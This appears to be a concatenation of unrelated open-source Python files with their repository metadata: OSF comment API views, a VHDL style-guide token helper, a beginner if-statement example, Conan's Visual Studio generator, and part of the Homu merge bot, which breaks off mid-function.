Note that if an anonymous view_only key is being used, the user relationship will not be exposed.
##Attributes
OSF comment entities have the "comments" `type`.
name type description
=================================================================================
content string content of the comment
date_created iso8601 timestamp timestamp that the comment was created
date_modified iso8601 timestamp timestamp when the comment was last updated
modified boolean has this comment been edited?
deleted boolean is this comment deleted?
is_abuse boolean has this comment been reported by the current user?
has_children boolean does this comment have replies?
can_edit boolean can the current user edit this comment?
##Relationships
###User
The user who created the comment.
###Node
The project associated with this comment.
###Target
The "parent" of the comment. If the comment was made on a node, the target is the node. If the comment
is a reply, its target is the comment it was in reply to.
###Replies
List of replies to this comment. New replies can be created through this endpoint.
###Reports
List of spam reports for this comment. Only users with permission to create comments can
access this endpoint, and users can only see reports that they have created.
##Links
self: the canonical api endpoint of this comment
##Actions
###Update
Method: PUT / PATCH
URL: /links/self
Query Params: <none>
Body (JSON): {
"data": {
"type": "comments", # required
"id": {comment_id}, # required
"attributes": {
"content": {content}, # mandatory
"deleted": {is_deleted}, # mandatory
}
}
}
Success: 200 OK + comment representation
To update a comment, issue either a PUT or a PATCH request against the `/links/self` URL. The `content`
and `deleted` fields are mandatory if you PUT and optional if you PATCH. Non-string values will be accepted and
stringified, but we make no promises about the stringification output. So don't do that.
To restore a deleted comment, issue a PATCH request against the `/links/self` URL, with `deleted: False`.
###Delete
Method: DELETE
URL: /links/self
Query Params: <none>
Success: 204 No Content
To delete a comment send a DELETE request to the `/links/self` URL. Nothing will be returned in the response
body. Attempting to delete an already deleted comment will result in a 400 Bad Request response.
##Query Params
*None*.
#This Request/Response
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
CommentDetailPermissions,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.NODE_COMMENTS_READ]
required_write_scopes = [CoreScopes.NODE_COMMENTS_WRITE]
serializer_class = CommentDetailSerializer
view_category = 'comments'
view_name = 'comment-detail'
# overrides RetrieveAPIView
def get_object(self):
return self.get_comment()
def perform_destroy(self, instance):
auth = Auth(self.request.user)
if instance.is_deleted:
raise ValidationError('Comment already deleted.')
else:
try:
instance.delete(auth, save=True)
except PermissionsError:
raise PermissionDenied('Not authorized to delete this comment.')
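# A hedged client-side sketch of the Update action documented above; the base
# URL, comment id, and `token` variable are invented for illustration:
#
#     import requests
#     requests.patch(
#         'https://api.osf.io/v2/comments/abc12/',
#         json={'data': {'type': 'comments', 'id': 'abc12',
#                        'attributes': {'content': 'updated text'}}},
#         headers={'Authorization': 'Bearer ' + token},
#     )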
class CommentReportsList(JSONAPIBaseView, generics.ListCreateAPIView, CommentMixin):
"""List of reports made for a comment. *Writeable*.
Paginated list of reports for a comment. Each resource contains the full representation of the
report, meaning additional requests to an individual comment's report detail view are not necessary.
###Permissions
The comment reports endpoint can only be viewed by users with permission to comment on the node. Users
are only shown comment reports that they have made.
##Attributes
OSF comment report entities have the "comment_reports" `type`.
name type description
=====================================================================================
category string the type of spam, must be one of the allowed values
message string description of why the comment was reported
##Links
See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination).
##Actions
###Create
Method: POST
URL: /links/self
Query Params: <none>
Body (JSON): {
"data": {
"type": "comment_reports", # required
"attributes": {
"category": {category}, # mandatory
"message": {text}, # optional
}
}
}
Success: 201 CREATED + comment report representation
To create a report for this comment, issue a POST request against this endpoint. The `category` field is mandatory,
and must be one of the following: "spam", "hate" or "violence" . The `message` field is optional. If the comment
report creation is successful the API will return a 201 response with the representation of the new comment report
in the body. For the new comment report's canonical URL, see the `/links/self` field of the response.
##Query Params
*None*.
#This Request/Response
"""
permission_classes = (
drf_permissions.IsAuthenticated,
CommentReportsPermissions,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.COMMENT_REPORTS_READ]
required_write_scopes = [CoreScopes.COMMENT_REPORTS_WRITE]
serializer_class = CommentReportSerializer
view_category = 'comments'
view_name = 'comment-reports'
def get_queryset(self):
user_id = self.request.user._id
comment = self.get_comment()
reports = comment.reports
serialized_reports = []
if user_id in reports:
report = CommentReport(user_id, reports[user_id]['category'], reports[user_id]['text'])
serialized_reports.append(report)
return serialized_reports
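# A hedged sketch of the Create action documented above (URL and comment id
# are invented; "spam" is one of the allowed categories):
#
#     requests.post(
#         'https://api.osf.io/v2/comments/abc12/reports/',
#         json={'data': {'type': 'comment_reports',
#                        'attributes': {'category': 'spam',
#                                       'message': 'unsolicited advertising'}}},
#         headers={'Authorization': 'Bearer ' + token},
#     )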
class CommentReportDetail(JSONAPIBaseView, generics.RetrieveUpdateDestroyAPIView, CommentMixin):
"""Details about a specific comment report. *Writeable*.
###Permissions
A comment report detail can only be viewed, edited and removed by the user who created the report.
##Attributes
OSF comment report entities have the "comment_reports" `type`.
name type description
=====================================================================================
category string the type of spam, must be one of the allowed values
message string description of why the comment was reported
##Links
self: the canonical api endpoint of this comment report
##Actions
###Update
Method: PUT / PATCH
URL: /links/self
Query Params: <none>
Body (JSON): {
"data": {
"type": "comment_reports", # required
"id": {user_id}, # required
"attributes": {
"category": {category}, # mandatory
"message": {text}, # optional
}
}
}
Success: 200 OK + comment report representation
To update a report for this comment, issue a PUT/PATCH request against this endpoint. The `category` field is
mandatory for a PUT request and must be one of the following: "spam", "hate" or "violence". The `message` field
is optional. Non-string values will be accepted and stringified, but we make no promises about the stringification
output. So don't do that.
###Delete
Method: DELETE
URL: /links/self
Query Params: <none>
Success: 204 + No content
To delete a comment report, issue a DELETE request against `/links/self`. A successful delete will return a
204 No Content response.
##Query Params
*None*.
#This Request/Response
"""
permission_classes = (
drf_permissions.IsAuthenticated,
CommentReportsPermissions,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.COMMENT_REPORTS_READ]
required_write_scopes = [CoreScopes.COMMENT_REPORTS_WRITE]
serializer_class = CommentReportDetailSerializer
view_category = 'comments'
view_name = 'report-detail'
# overrides RetrieveUpdateDestroyAPIView
def get_object(self):
comment = self.get_comment()
reports = comment.reports
user_id = self.request.user._id
reporter_id = self.kwargs['user_id']
if reporter_id != user_id:
raise PermissionDenied("Not authorized to comment on this project.")
if reporter_id in reports:
return CommentReport(user_id, reports[user_id]['category'], reports[user_id]['text'])
else:
raise Gone(detail='The requested comment report is no longer available.')
# overrides RetrieveUpdateDestroyAPIView
def perform_destroy(self, instance):
user = self.request.user
comment = self.get_comment()
try:
comment.retract_report(user, save=True)
except ValueError as error:
raise ValidationError(error.message)
|
asanfilippo7/osf.io
|
api/comments/views.py
|
Python
|
apache-2.0
| 12,700 | 0.003622 |
from vsg.vhdlFile.extract import tokens
def get_n_token_after_tokens(iToken, lTokens, lAllTokens, oTokenMap):
    """Return, for each occurrence of any token in lTokens, the token located
    iToken non-whitespace (comment-excluded) tokens after it."""
lReturn = []
lIndexes = []
for oToken in lTokens:
lTemp = oTokenMap.get_token_indexes(oToken)
for iTemp in lTemp:
iTokenIndex = iTemp
for iCount in range(0, iToken):
iTokenIndex = oTokenMap.get_index_of_next_non_whitespace_token(iTokenIndex, bExcludeComments=True)
lIndexes.append(iTokenIndex)
lIndexes.sort()
for iIndex in lIndexes:
iLine = oTokenMap.get_line_number_of_index(iIndex)
lReturn.append(tokens.New(iIndex, iLine, [lAllTokens[iIndex]]))
return lReturn
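# Hedged usage sketch, where oSomeToken stands in for a real vsg token class:
#
#     lResults = get_n_token_after_tokens(2, [oSomeToken], lAllTokens, oTokenMap)
#
# returns, for each occurrence of oSomeToken, the token found two
# non-whitespace (comment-excluded) tokens later, wrapped with its line number.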
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/vhdlFile/extract/get_n_token_after_tokens.py
|
Python
|
gpl-3.0
| 688 | 0.001453 |
#!/usr/bin/env python3
number = 23
guess = int(input('Enter an integer : '))
if guess == number:
    # The new block begins here
print('Congratulations, you guessed it.')
print('(but you do not win any pizzas!)')
    # The new block ends here
elif guess < number:
    # Another code block
print('No, it is a little higher than that')
    # You can do whatever you want inside this block
else:
print('No, it is a little lower than that')
    # You reach here only by guessing a number greater than (>) the set number
print('Done')
# This final statement is executed
# after the if statement has completed.
|
pam-phy/python-notes
|
byte-of-python/if.py
|
Python
|
gpl-2.0
| 600 | 0.020833 |
import os
import re
from conans.model import Generator
from conans.paths import BUILD_INFO_VISUAL_STUDIO
from conans.client.tools.files import VALID_LIB_EXTENSIONS
class VisualStudioGenerator(Generator):
template = '''<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ImportGroup Label="PropertySheets" />
<PropertyGroup Label="UserMacros" />
<PropertyGroup Label="Conan-RootDirs">{item_properties}
</PropertyGroup>
{properties}
<ItemGroup />
</Project>'''
properties_template = '''<PropertyGroup Label="ConanVariables"{condition}>
<ConanPackageName>{conan_package_name}</ConanPackageName>
<ConanPackageVersion>{conan_package_version}</ConanPackageVersion>
<ConanCompilerFlags>{compiler_flags}</ConanCompilerFlags>
<ConanLinkerFlags>{linker_flags}</ConanLinkerFlags>
<ConanPreprocessorDefinitions>{definitions}</ConanPreprocessorDefinitions>
<ConanIncludeDirectories>{include_dirs}</ConanIncludeDirectories>
<ConanResourceDirectories>{res_dirs}</ConanResourceDirectories>
<ConanLibraryDirectories>{lib_dirs}</ConanLibraryDirectories>
<ConanBinaryDirectories>{bin_dirs}</ConanBinaryDirectories>
<ConanLibraries>{libs}</ConanLibraries>
<ConanSystemDeps>{system_libs}</ConanSystemDeps>
</PropertyGroup>
<PropertyGroup{condition}>
<LocalDebuggerEnvironment>PATH=%PATH%;{bin_dirs}</LocalDebuggerEnvironment>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<ItemDefinitionGroup{condition}>
<ClCompile>
<AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>$(ConanPreprocessorDefinitions)%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalOptions>$(ConanCompilerFlags) %(AdditionalOptions)</AdditionalOptions>
</ClCompile>
<Link>
<AdditionalLibraryDirectories>$(ConanLibraryDirectories)%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<AdditionalDependencies>$(ConanLibraries)%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>$(ConanSystemDeps)%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalOptions>$(ConanLinkerFlags) %(AdditionalOptions)</AdditionalOptions>
</Link>
<Midl>
<AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</Midl>
<ResourceCompile>
<AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>$(ConanPreprocessorDefinitions)%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalOptions>$(ConanCompilerFlags) %(AdditionalOptions)</AdditionalOptions>
</ResourceCompile>
</ItemDefinitionGroup>'''
item_template = '''
<Conan-{name}-Root>{root_dir}</Conan-{name}-Root>'''
def _format_items(self):
sections = []
for dep_name, cpp_info in self._deps_build_info.dependencies:
fields = {
'root_dir': cpp_info.rootpath,
'name': dep_name.replace(".", "-")
}
section = self.item_template.format(**fields)
sections.append(section)
return "".join(sections)
@property
def filename(self):
return BUILD_INFO_VISUAL_STUDIO
def _format_properties(self, build_info, condition):
def has_valid_ext(lib):
ext = os.path.splitext(lib)[1]
return ext in VALID_LIB_EXTENSIONS
fields = {
'conan_package_name': self.conanfile.name if self.conanfile.name else "",
'conan_package_version': self.conanfile.version if self.conanfile.version else "",
'condition': condition,
'bin_dirs': "".join("%s;" % p for p in build_info.bin_paths),
'res_dirs': "".join("%s;" % p for p in build_info.res_paths),
'include_dirs': "".join("%s;" % p for p in build_info.include_paths),
'lib_dirs': "".join("%s;" % p for p in build_info.lib_paths),
'libs': "".join(['%s.lib;' % lib if not has_valid_ext(lib)
else '%s;' % lib for lib in build_info.libs]),
'system_libs': "".join(['%s.lib;' % sys_dep if not has_valid_ext(sys_dep)
else '%s;' % sys_dep for sys_dep in build_info.system_libs]),
'definitions': "".join("%s;" % d for d in build_info.defines),
'compiler_flags': " ".join(build_info.cxxflags + build_info.cflags),
'linker_flags': " ".join(build_info.sharedlinkflags),
'exe_flags': " ".join(build_info.exelinkflags)
}
formatted_template = self.properties_template.format(**fields)
return formatted_template
@property
def content(self):
per_item_props = self._format_items()
properties = [self._format_properties(self._deps_build_info, condition='')]
for config, cpp_info in self._deps_build_info.configs.items():
condition = " Condition=\"'$(Configuration)' == '%s'\"" % config
properties.append(self._format_properties(cpp_info, condition=condition))
fields = {
'item_properties': per_item_props,
'properties': '\n'.join(properties)
}
formatted_template = self.template.format(**fields)
userprofile = os.getenv("USERPROFILE")
if userprofile:
userprofile = userprofile.replace("\\", "\\\\")
formatted_template = re.sub(userprofile, "$(USERPROFILE)", formatted_template,
flags=re.I)
return formatted_template
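# Hedged usage note: consumers are assumed to request this generator under the
# name "visual_studio", e.g. in a conanfile.txt:
#
#     [requires]
#     zlib/1.2.11
#
#     [generators]
#     visual_studio
#
# `conan install` then writes the property sheet rendered above (filename taken
# from BUILD_INFO_VISUAL_STUDIO) for a .vcxproj to import.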
|
conan-io/conan
|
conans/client/generators/visualstudio.py
|
Python
|
mit
| 5,803 | 0.00224 |
import argparse
import github3
import toml
import json
import re
from . import utils
import logging
from threading import Thread, Lock
import time
import traceback
import sqlite3
import requests
from contextlib import contextmanager
from itertools import chain
from queue import Queue
import os
import subprocess
from .git_helper import SSH_KEY_FILE
import shlex
import sys
STATUS_TO_PRIORITY = {
'success': 0,
'pending': 1,
'approved': 2,
'': 3,
'error': 4,
'failure': 5,
}
INTERRUPTED_BY_HOMU_FMT = 'Interrupted by Homu ({})'
INTERRUPTED_BY_HOMU_RE = re.compile(r'Interrupted by Homu \((.+?)\)')
TEST_TIMEOUT = 3600 * 10
@contextmanager
def buildbot_sess(repo_cfg):
sess = requests.Session()
sess.post(repo_cfg['buildbot']['url'] + '/login', allow_redirects=False, data={
'username': repo_cfg['buildbot']['username'],
'passwd': repo_cfg['buildbot']['password'],
})
yield sess
sess.get(repo_cfg['buildbot']['url'] + '/logout', allow_redirects=False)
db_query_lock = Lock()
def db_query(db, *args):
with db_query_lock:
db.execute(*args)
class PullReqState:
num = 0
priority = 0
rollup = False
title = ''
body = ''
head_ref = ''
base_ref = ''
assignee = ''
delegate = ''
def __init__(self, num, head_sha, status, db, repo_label, mergeable_que, gh, owner, name, repos):
self.head_advanced('', use_db=False)
self.num = num
self.head_sha = head_sha
self.status = status
self.db = db
self.repo_label = repo_label
self.mergeable_que = mergeable_que
self.gh = gh
self.owner = owner
self.name = name
self.repos = repos
self.test_started = time.time() # FIXME: Save in the local database
def head_advanced(self, head_sha, *, use_db=True):
self.head_sha = head_sha
self.approved_by = ''
self.status = ''
self.merge_sha = ''
self.build_res = {}
self.try_ = False
self.mergeable = None
if use_db:
self.set_status('')
self.set_mergeable(None)
self.init_build_res([])
def __repr__(self):
return 'PullReqState:{}/{}#{}(approved_by={}, priority={}, status={})'.format(
self.owner,
self.name,
self.num,
self.approved_by,
self.priority,
self.status,
)
def sort_key(self):
return [
STATUS_TO_PRIORITY.get(self.get_status(), -1),
1 if self.mergeable is False else 0,
0 if self.approved_by else 1,
1 if self.rollup else 0,
-self.priority,
self.num,
]
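    # Ascending sort over this key: finished or pending builds come first,
    # then approved PRs; known-unmergeable and rollup PRs sink, while higher
    # `priority` values and lower PR numbers rise.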
def __lt__(self, other):
return self.sort_key() < other.sort_key()
def get_issue(self):
issue = getattr(self, 'issue', None)
if not issue:
issue = self.issue = self.get_repo().issue(self.num)
return issue
def add_comment(self, text):
self.get_issue().create_comment(text)
def set_status(self, status):
self.status = status
db_query(self.db, 'UPDATE pull SET status = ? WHERE repo = ? AND num = ?', [self.status, self.repo_label, self.num])
# FIXME: self.try_ should also be saved in the database
if not self.try_:
db_query(self.db, 'UPDATE pull SET merge_sha = ? WHERE repo = ? AND num = ?', [self.merge_sha, self.repo_label, self.num])
def get_status(self):
return 'approved' if self.status == '' and self.approved_by and self.mergeable is not False else self.status
def set_mergeable(self, mergeable, *, cause=None, que=True):
if mergeable is not None:
self.mergeable = mergeable
db_query(self.db, 'INSERT OR REPLACE INTO mergeable (repo, num, mergeable) VALUES (?, ?, ?)', [self.repo_label, self.num, self.mergeable])
else:
if que:
self.mergeable_que.put([self, cause])
else:
self.mergeable = None
db_query(self.db, 'DELETE FROM mergeable WHERE repo = ? AND num = ?', [self.repo_label, self.num])
def init_build_res(self, builders, *, use_db=True):
self.build_res = {x: {
'res': None,
'url': '',
} for x in builders}
if use_db:
db_query(self.db, 'DELETE FROM build_res WHERE repo = ? AND num = ?', [self.repo_label, self.num])
def set_build_res(self, builder, res, url):
if builder not in self.build_res:
raise Exception('Invalid builder: {}'.format(builder))
self.build_res[builder] = {
'res': res,
'url': url,
}
db_query(self.db, 'INSERT OR REPLACE INTO build_res (repo, num, builder, res, url, merge_sha) VALUES (?, ?, ?, ?, ?, ?)', [
self.repo_label,
self.num,
builder,
res,
url,
self.merge_sha,
])
def build_res_summary(self):
return ', '.join('{}: {}'.format(builder, data['res'])
for builder, data in self.build_res.items())
def get_repo(self):
repo = self.repos[self.repo_label]
if not repo:
self.repos[self.repo_label] = repo = self.gh.repository(self.owner, self.name)
assert repo.owner.login == self.owner
assert repo.name == self.name
return repo
def save(self):
db_query(self.db, 'INSERT OR REPLACE INTO pull (repo, num, status, merge_sha, title, body, head_sha, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', [
self.repo_label,
self.num,
self.status,
self.merge_sha,
self.title,
self.body,
self.head_sha,
self.head_ref,
self.base_ref,
self.assignee,
self.approved_by,
self.priority,
self.try_,
self.rollup,
self.delegate,
])
def refresh(self):
issue = self.get_repo().issue(self.num)
self.title = issue.title
self.body = issue.body
def fake_merge(self, repo_cfg):
if repo_cfg.get('linear', False) or repo_cfg.get('autosquash', False):
msg = '''!!! Temporary commit !!!
This commit is artificially made up to mark PR {} as merged.
If this commit remained in the history, you can safely reset HEAD to {}.
This is possibly due to protected branches, which forbids force-pushing.
You are advised to turn off protected branches, or disable certain Homu
features that require force-pushing, such as linear history or
auto-squashing.
[ci skip]'''.format(self.num, self.merge_sha)
def inner():
# `merge()` will return `None` if the `head_sha` commit is already part of the `base_ref` branch, which means rebasing didn't have to modify the original commit
merge_commit = self.get_repo().merge(self.base_ref, self.head_sha, msg)
if merge_commit:
self.fake_merge_sha = merge_commit.sha
def fail(err):
self.add_comment(':warning: Unable to mark this PR as merged. Closing instead. ({})'.format(err))
self.get_issue().close()
utils.retry_until(inner, fail, self)
def sha_cmp(short, full):
return len(short) >= 4 and short == full[:len(short)]
def sha_or_blank(sha):
return sha if re.match(r'^[0-9a-f]+$', sha) else ''
def parse_commands(body, username, repo_cfg, state, my_username, db, states, *, realtime=False, sha=''):
try_only = False
if username not in repo_cfg['reviewers'] and username != my_username:
if username.lower() == state.delegate.lower():
pass # Allow users who have been delegated review powers
elif username in repo_cfg.get('try_users', []):
try_only = True
else:
return False
state_changed = False
words = list(chain.from_iterable(re.findall(r'\S+', x) for x in body.splitlines() if '@' + my_username in x))
for i, word in reversed(list(enumerate(words))):
found = True
if word == 'r+' or word.startswith('r='):
if try_only:
if realtime: state.add_comment(':key: Insufficient privileges')
continue
if not sha and i+1 < len(words):
cur_sha = sha_or_blank(words[i+1])
else:
cur_sha = sha
approver = word[len('r='):] if word.startswith('r=') else username
# Ignore "r=me"
if approver == 'me':
continue
# Sometimes, GitHub sends the head SHA of a PR as 0000000 through the webhook. This is
# called a "null commit", and seems to happen when GitHub internally encounters a race
# condition. Last time, it happened when squashing commits in a PR. In this case, we
# just try to retrieve the head SHA manually.
if all(x == '0' for x in state.head_sha):
if realtime: state.add_comment(':bangbang: Invalid head SHA found, retrying: `{}`'.format(state.head_sha))
state.head_sha = state.get_repo().pull_request(state.num).head.sha
state.save()
assert any(x != '0' for x in state.head_sha)
if state.approved_by and realtime and username != my_username:
for _state in states[state.repo_label].values():
if _state.status == 'pending':
break
else:
_state = None
lines = []
if state.status in ['failure', 'error']:
lines.append('- This pull request previously failed. You should add more commits to fix the bug, or use `retry` to trigger a build again.')
if _state:
if state == _state:
lines.append('- This pull request is currently being tested. If there\'s no response from the continuous integration service, you may use `retry` to trigger a build again.')
else:
lines.append('- There\'s another pull request that is currently being tested, blocking this pull request: #{}'.format(_state.num))
if lines: lines.insert(0, '')
lines.insert(0, ':bulb: This pull request was already approved, no need to approve it again.')
state.add_comment('\n'.join(lines))
if sha_cmp(cur_sha, state.head_sha):
state.approved_by = approver
state.save()
elif realtime and username != my_username:
if cur_sha:
msg = '`{}` is not a valid commit SHA.'.format(cur_sha)
state.add_comment(':scream_cat: {} Please try again with `{:.7}`.'.format(msg, state.head_sha))
else:
state.add_comment(':pushpin: Commit {:.7} has been approved by `{}`\n\n<!-- @{} r={} {} -->'.format(state.head_sha, approver, my_username, approver, state.head_sha))
elif word == 'r-':
if try_only:
if realtime: state.add_comment(':key: Insufficient privileges')
continue
state.approved_by = ''
state.save()
elif word.startswith('p='):
try: state.priority = int(word[len('p='):])
except ValueError: pass
state.save()
elif word.startswith('delegate='):
if try_only:
if realtime: state.add_comment(':key: Insufficient privileges')
continue
state.delegate = word[len('delegate='):]
state.save()
if realtime: state.add_comment(':v: @{} can now approve this pull request'.format(state.delegate))
elif word == 'delegate-':
state.delegate = ''
state.save()
elif word == 'delegate+':
if try_only:
if realtime: state.add_comment(':key: Insufficient privileges')
continue
state.delegate = state.get_repo().pull_request(state.num).user.login
state.save()
if realtime: state.add_comment(':v: @{} can now approve this pull request'.format(state.delegate))
elif word == 'retry' and realtime:
state.set_status('')
elif word in ['try', 'try-'] and realtime:
state.try_ = word == 'try'
state.merge_sha = ''
state.init_build_res([])
state.save()
elif word in ['rollup', 'rollup-']:
state.rollup = word == 'rollup'
state.save()
elif word == 'force' and realtime:
with buildbot_sess(repo_cfg) as sess:
res = sess.post(repo_cfg['buildbot']['url'] + '/builders/_selected/stopselected', allow_redirects=False, data={
'selected': repo_cfg['buildbot']['builders'],
'comments': INTERRUPTED_BY_HOMU_FMT.format(int(time.time())),
})
if 'authzfail' in res.text:
err = 'Authorization failed'
else:
mat = re.search('(?s)<div class="error">(.*?)</div>', res.text)
if mat:
err = mat.group(1).strip()
if not err: err = 'Unknown error'
else:
err = ''
if err:
state.add_comment(':bomb: Buildbot returned an error: `{}`'.format(err))
elif word == 'clean' and realtime:
state.merge_sha = ''
state.init_build_res([])
state.save()
else:
found = False
if found:
state_changed = True
words[i] = ''
return state_changed
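# Hedged examples of comment bodies this parser acts on, assuming the bot's
# GitHub login ("my_username") is bors:
#
#     @bors r+ 1a2b3c4     -> approve the PR at commit 1a2b3c4
#     @bors r=alice        -> approve on behalf of reviewer alice
#     @bors r- p=10 rollup -> revoke approval, set priority, mark as rollup
#     @bors try            -> start a try build without approving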
def git_push(fpath, branch, state):
merge_sha = subprocess.check_output(['git', '-C', fpath, 'rev-parse', 'HEAD']).decode('ascii').strip()
if utils.silent_call(['git', '-C', fpath, 'push', '-f', 'origin', branch]):
utils.logged_call(['git', '-C', fpath, 'branch', '-f', 'homu-tmp', branch])
utils.logged_call(['git', '-C', fpath, 'push', '-f', 'origin', 'homu-tmp'])
def inner():
utils.github_create_status(state.get_repo(), merge_sha, 'success', '', 'Branch protection bypassed', context='homu')
def fail(err):
state.add_comment(':boom: Unable to create a status for {} ({})'.format(merge_sha, err))
utils.retry_until(inner, fail, state)
utils.logged_call(['git', '-C', fpath, 'push', '-f', 'origin', branch])
return merge_sha
def create_merge(state, repo_cfg, branch, git_cfg):
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
state.refresh()
merge_msg = 'Auto merge of #{} - {}, r={}\n\n{}\n\n{}'.format(
state.num,
state.head_ref,
'<try>' if state.try_ else state.approved_by,
state.title,
state.body,
)
desc = 'Merge conflict'
if git_cfg['local_git']:
pull = state.get_repo().pull_request(state.num)
fpath = 'cache/{}/{}'.format(repo_cfg['owner'], repo_cfg['name'])
url = 'git@github.com:{}/{}.git'.format(repo_cfg['owner'], repo_cfg['name'])
os.makedirs(os.path.dirname(SSH_KEY_FILE), exist_ok=True)
with open(SSH_KEY_FILE, 'w') as fp:
fp.write(git_cfg['ssh_key'])
os.chmod(SSH_KEY_FILE, 0o600)
if not os.path.exists(fpath):
utils.logged_call(['git', 'init', fpath])
utils.logged_call(['git', '-C', fpath, 'remote', 'add', 'origin', url])
utils.logged_call(['git', '-C', fpath, 'fetch', 'origin', state.base_ref, 'pull/{}/head'.format(state.num)])
utils.silent_call(['git', '-C', fpath, 'rebase', '--abort'])
utils.silent_call(['git', '-C', fpath, 'merge', '--abort'])
if repo_cfg.get('linear', False):
utils.logged_call(['git', '-C', fpath, 'checkout', '-B', branch, state.head_sha])
try:
utils.logged_call(['git', '-C', fpath, '-c', 'user.name=' + git_cfg['name'], '-c', 'user.email=' + git_cfg['email'], 'rebase'] + (['-i', '--autosquash'] if repo_cfg.get('autosquash', False) else []) + [base_sha])
except subprocess.CalledProcessError:
if repo_cfg.get('autosquash', False):
utils.silent_call(['git', '-C', fpath, 'rebase', '--abort'])
if utils.silent_call(['git', '-C', fpath, 'rebase', base_sha]) == 0:
desc = 'Auto-squashing failed'
else:
text = '\nPull request: #{}\nApproved by: {}'.format(state.num, '<try>' if state.try_ else state.approved_by)
msg_code = 'cat && echo {}'.format(shlex.quote(text))
env_code = 'export GIT_COMMITTER_NAME={} && export GIT_COMMITTER_EMAIL={} && unset GIT_COMMITTER_DATE'.format(shlex.quote(git_cfg['name']), shlex.quote(git_cfg['email']))
utils.logged_call(['git', '-C', fpath, 'filter-branch', '-f', '--msg-filter', msg_code, '--env-filter', env_code, '{}..'.format(base_sha)])
return git_push(fpath, branch, state)
else:
utils.logged_call(['git', '-C', fpath, 'checkout', '-B', 'homu-tmp', state.head_sha])
ok = True
if repo_cfg.get('autosquash', False):
try:
merge_base_sha = subprocess.check_output(['git', '-C', fpath, 'merge-base', base_sha, state.head_sha]).decode('ascii').strip()
utils.logged_call(['git', '-C', fpath, '-c', 'user.name=' + git_cfg['name'], '-c', 'user.email=' + git_cfg['email'], 'rebase', '-i', '--autosquash', '--onto', merge_base_sha, base_sha])
except subprocess.CalledProcessError:
desc = 'Auto-squashing failed'
ok = False
if ok:
utils.logged_call(['git', '-C', fpath, 'checkout', '-B', branch, base_sha])
try:
utils.logged_call(['git', '-C', fpath, '-c', 'user.name=' + git_cfg['name'], '-c', 'user.email=' + git_cfg['email'], 'merge', 'heads/homu-tmp', '-m', merge_msg])
except subprocess.CalledProcessError:
pass
else:
return git_push(fpath, branch, state)
else:
if repo_cfg.get('linear', False) or repo_cfg.get('autosquash', False):
raise RuntimeError('local_git must be turned on to use this feature')
if branch != state.base_ref:
utils.github_set_ref(
state.get_repo(),
'heads/' + branch,
base_sha,
force=True,
)
try: merge_commit = state.get_repo().merge(branch, state.head_sha, merge_msg)
except github3.models.GitHubError as e:
if e.code != 409: raise
else:
return merge_commit.sha if merge_commit else ''
state.set_status('error')
utils.github_create_status(state.get_repo(), state.head_sha, 'error', '', desc, context='homu')
state.add_comment(':lock: ' + desc)
return ''
def start_build(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
if buildbot_slots[0]:
return True
assert state.head_sha == state.get_repo().pull_request(state.num).head.sha
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' in repo_cfg:
branch = 'try' if state.try_ else 'auto'
branch = repo_cfg.get('branch', {}).get(branch, branch)
builders = repo_cfg['buildbot']['try_builders' if state.try_ else 'builders']
elif 'travis' in repo_cfg:
branch = repo_cfg.get('branch', {}).get('auto', 'auto')
builders = ['travis']
elif 'status' in repo_cfg:
branch = repo_cfg.get('branch', {}).get('auto', 'auto')
builders = ['status']
else:
raise RuntimeError('Invalid configuration')
if state.approved_by and builders == ['status'] and repo_cfg['status']['context'] == 'continuous-integration/travis-ci/push':
for info in utils.github_iter_statuses(state.get_repo(), state.head_sha):
if info.context == 'continuous-integration/travis-ci/pr':
if info.state == 'success':
mat = re.search('/builds/([0-9]+)$', info.target_url)
if mat:
url = 'https://api.travis-ci.org/{}/{}/builds/{}'.format(state.owner, state.name, mat.group(1))
res = requests.get(url)
travis_sha = json.loads(res.text)['commit']
travis_commit = state.get_repo().commit(travis_sha)
if travis_commit:
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
if [travis_commit.parents[0]['sha'], travis_commit.parents[1]['sha']] == [base_sha, state.head_sha]:
try: merge_sha = create_merge(state, repo_cfg, state.base_ref, git_cfg)
except subprocess.CalledProcessError:
print('* Unable to create a merge commit for the exempted PR: {}'.format(state))
traceback.print_exc()
else:
if merge_sha:
desc = 'Test exempted'
url = info.target_url
state.set_status('success')
utils.github_create_status(state.get_repo(), state.head_sha, 'success', url, desc, context='homu')
state.add_comment(':zap: {} - [{}]({})'.format(desc, 'status', url))
state.merge_sha = merge_sha
state.save()
state.fake_merge(repo_cfg)
return True
break
merge_sha = create_merge(state, repo_cfg, branch, git_cfg)
if not merge_sha:
return False
state.init_build_res(builders)
state.merge_sha = merge_sha
state.save()
if 'buildbot' in repo_cfg:
buildbot_slots[0] = state.merge_sha
logger.info('Starting build of {}/{}#{} on {}: {}'.format(state.owner,
state.name,
state.num, branch, state.merge_sha))
state.test_started = time.time()
state.set_status('pending')
desc = '{} commit {:.7} with merge {:.7}...'.format('Trying' if state.try_ else 'Testing', state.head_sha, state.merge_sha)
